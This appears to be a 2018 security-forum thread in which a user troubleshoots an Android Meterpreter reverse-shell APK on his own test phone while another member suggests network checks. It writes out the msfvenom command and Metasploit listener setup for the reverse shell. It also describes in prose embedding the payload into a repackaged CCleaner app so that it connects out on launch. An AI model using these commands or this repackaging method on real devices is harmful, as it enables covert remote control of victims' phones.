B4dger Posted December 14, 2018 Share Posted December 14, 2018 Hi I'm reasonably new to using metasploit and can create a .apk with reverse shell without any issues but when I upload it on my test android running 8.1, it does not open a connection. It lets me install it but gives no option to open and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have gave the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong? Much appreciated... Quote Link to comment Share on other sites More sharing options...
digininja Posted December 14, 2018 Share Posted December 14, 2018 Have you tried monitoring traffic from the phone to see if it tries to reach out? Can the phone definitely see the Metasploit listener? i.e. is there any NAT'ing or firewalls in the way? Quote Link to comment Share on other sites More sharing options...
B4dger Posted December 14, 2018 Author Share Posted December 14, 2018 Thanks for your reply. Yeah. Used wireshark to monitor my PC for any attempted connection on port 4001 that I configured in the apk and listener and nothing is coming through. I also monitored the android phone and nothing on that end either. I have screen shots but unsure how to upload them. This is the list of commands in case they are any help: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4001 R > /root/evil.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 10088 bytes msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcpmsf exploit(multi/handler) > set LHOST 192.168.0.17 LHOST => 192.168.0.17msf exploit(multi/handler) > set LPORT 4001 LPORT => 4001msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.0.17:4001 Quote Link to comment Share on other sites More sharing options...
digininja Posted December 14, 2018 Share Posted December 14, 2018 Try browsing to 192.168.0.17:4001 from the phone and watch for traffic, see if any traffic can get out to it. And to upload images, there is a file attachment feature at the bottom of the editor. Quote Link to comment Share on other sites More sharing options...
B4dger Posted December 14, 2018 Author Share Posted December 14, 2018 Nothings getting through. Tried running a quick Apache server to double check it and not connecting to that either. I can't seem to figure out how to add them from there, only give an option to add from URL or existing attachment. Quote Link to comment Share on other sites More sharing options...
digininja Posted December 14, 2018 Share Posted December 14, 2018 For attachments, did you try this? and if nothing is getting through then you've probably messed networking up somehow, check routing and firewalls. Try a simple netcat listener on port 80 and browse to that to see if that gets through. Quote Link to comment Share on other sites More sharing options...
B4dger Posted December 14, 2018 Author Share Posted December 14, 2018 Will check in a couple of hours when I get back and let you know how it goes. Appreciate your help. Quote Link to comment Share on other sites More sharing options...
digininja Posted December 14, 2018 Share Posted December 14, 2018 just a warning, as a new member you are limited to 5 posts a day so make sure your next one is a good one as you won't be able to do another till tomorrow. Quote Link to comment Share on other sites More sharing options...
B4dger Posted December 15, 2018 Author Share Posted December 15, 2018 Thanks. I worked it out, in a way. After banging my head against the wall for another 5 or 6 hours 😂. I don't know why the regular meterpreter.apk wouldn't run but I got it to work by disassembling the CCleaner.apk I downloaded and manually embedding the code in it, installed it on my droid and after many many attempts got it right and meterpreter session now connects when the CCleaner app is opened. Thanks for your help, certainly helped me in troubleshooting what was wrong. Quote Link to comment Share on other sites More sharing options...
digininja Posted December 15, 2018 Share Posted December 15, 2018 Glad you fixed it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.